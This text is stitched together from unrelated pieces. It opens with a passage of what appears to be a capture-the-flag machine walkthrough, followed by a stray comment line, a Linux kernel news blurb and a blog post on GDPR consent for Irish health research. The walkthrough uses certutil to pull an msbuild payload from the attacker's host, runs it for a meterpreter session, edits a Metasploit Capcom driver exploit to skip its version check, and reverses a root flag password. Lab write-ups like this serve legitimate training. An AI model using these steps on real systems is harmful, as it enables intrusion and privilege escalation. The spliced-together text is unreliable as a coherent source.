We setup our listener and got a reverse shell.
nc -lvp 80
We are not able to find anything on the target machine. So we try to convert our shell into meterpreter but are unable to run any exe file. So there was a firewall that didn’t allow us to run any exe file. We got a reference through this link on how to bypass this. We use the nps payload to create a XML file that will contain our payload (download from here).
We move into “c:\users\sqlserv” as we have a shell as user sqlserv.
We run the command provided by npc payload to start our listener.
msfconsole -r msbuild_nps.rc
We start our python HTTP Server to send our file to the target machine.
python -m SimpleHTTPServer 80
We download the file using certutil.exe on the target machine.
certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml
We then run the XML file we uploaded using msbuild.exe.
As soon as we run the file we get a meterpreter session. As we can see by running sysinfo we have 32-bit meterpreter session on a 64-bit machine.
To convert it into 64-bit session, we check the processes and find the 64-bit running process. We then migrate our process to a 64-bit process and get a 64-bit session.
meterpreter > ps meterpreter > migrate 2320
We still don’t find anything to escalate our privilege. As this machine on street fighter game we try to google street fighter exploit and find that street fighter 5 has privilege escalation vulnerability. We find that street fighter has a service called Capcom, so we check if street fighter 5 is installed on the target machine.
sc query capcom
We find this metasploit exploit here, we try to run it but are unable to get shell as it gave an error stating that the system was not vulnerable. So we make changes to the code and comment out the section where it checks the OS version.
Now we are successfully able to run the exploit.
msf > use exploit/windows/local/capcom_sys_exec msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp msf exploit(windows/local/capcom_sys_exec) > set lhost tun0 msf exploit(windows/local/capcom_sys_exec) > set lport 80 msf exploit(windows/local/capcom_sys_exec) > set session 2 msf exploit(windows/local/capcom_sys_exec)> run
When we check the uid we find that we are successfully able to get administrative rights.
We enumerate the directories to find the flags and inside “c:\users\decoder\Desktop”, we find a file called “user.txt”. When we take look at the content of the file we find our first flag.
We move into c:\users\Administratror\Desktop and find a file called “root.exe”. We run it and find that it asks for password. There is also a dll file called “checkdll.dll”, as the password might be checked using this dll file.
We download both the files into our system using meterpreter.
download root.exe /root/Desktop download checkdll.dll /root/Desktop
We reverse engineer them using IDA and find that this program XOR’s 9 with each character of the variable aFmFeholH. Now analysing with IDA tells us that the variable contains “Fm
So we create a c program that XOR’s 9 with each character of “FmfEhO1}h”.
We compile and run the file and get the the password to be “OdioLaFeta”.
When we provide the password to the root.exe we get our final flag.
Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here
And he did it without swearing... folks with broken programs may act otherwise
The Linux kernel will be tweaked to mitigate data-stealing attacks that exploit system page caches.…
By 30 April of this year, any organisation conducting health research in Ireland must either get consent to GDPR standard or else obtain a consent waiver. But in order to do the former, they need to know what explicit informed consent is (also known as GDPR-level consent). The problem is, a lot of people don’t know what’s involved. In this blog post, I’m going to try to clear up some of the misconceptions and outline the process involved in arriving at a conclusion.
This is a follow-up to the post I published in December about the changes that GDPR has brought to data protection impact assessments. The Health Research Consent Declaration Committee was established as part of the Health Research Regulations made under GDPR. In December, it launched its website at www.hrcdc.ie.
As yet, the committee itself has not been appointed but there is now a clear application process available to researchers who wish to apply for a consent waiver. So researchers need to ask themselves three questions:
- When did my research start (this date should be the date the research was approved by the medical ethics board)?
- Is my existing consent to the standard required by GDPR?
- Is my research in the public interest?
As the first question is relatively easy, let’s look at how you determine if your consent is good enough or if you will be required to reconsent your participants. The General Data Protection Regulation Article 4(11) defines consent as: “any freely given, specific, informed and unambiguous indication of the data subject’s wishes by which he or she, by a statement or by a clear affirmative action, signifies agreement to the processing of personal data relating to him or her.”
Guidelines for GDPR consent
All existing health research projects must have this level of consent in place by April 30th or else have applied to the HRCDC for a waiver. For your consent to be considered explicit informed consent, you must be able to answer yes to all of the following 11 statements:
- The request for consent is prominent and separate from any other terms and conditions
- Individual are asked to positively opt in by ticking a box for each processing activity and signing the consent form
- There are no pre-ticked boxes on the consent form
- The language used in the consent form is clear, plain and easy to read
- The form specifies why the data is being collected, what you will do with it and who it will be shared with
- The form has had separate distinct (‘granular’) options to consent to each purpose and type of processing? Including a consent to anonymise if required
- Individuals are informed they can withdraw their consent; this process is easy and they are not penalised in any way for such withdrawal
- Where and when consent was given is recorded as well as the data and time associated with consent withdrawal
- Consents will be reviewed regularly to ensure the purpose and processing has not changed
- When we rely on parental consent for minors, we have a process in place to update that consent when the individual turns 18
- We have a process in place to refresh consents when necessary.
Alternatives to consent
In the event you can’t answer affirmatively to all these questions and you are not in a position to reconsent your research participants, you will need to apply using one of the three available forms from the HRCDC website before the April 30 deadline.
1. An application form in relation to new research (that is research that commenced on or after 8 August 2018).
2. An application form in relation to re-consenting of current research (that is research that began before 8 August 2018). A consent declaration in this case applies, if made, only to personal data that the data controller currently holds.
3. An application form in relation to current research (that is research that began before 8 August 2018) and for which no consent was obtained. A consent declaration in this case applies, if made, only to personal data that the data controller currently holds.
Each application requires you to carry out a Data Privacy Impact Assessment and provide a summary of the finding of that process.
Most organisations carrying out health research have a data protection officer (DPO). If they were already getting consent for their research projects by following the old data protection guidelines, they should be able to clear this new bar relatively easily. But there may be some cases where organisations were doing research using historical data without consent. In these cases, it’s worth going through the process rigorously of checking whether they can apply for a consent declaration.
Tracy Elliott is a senior data protection consultant with BH Consulting.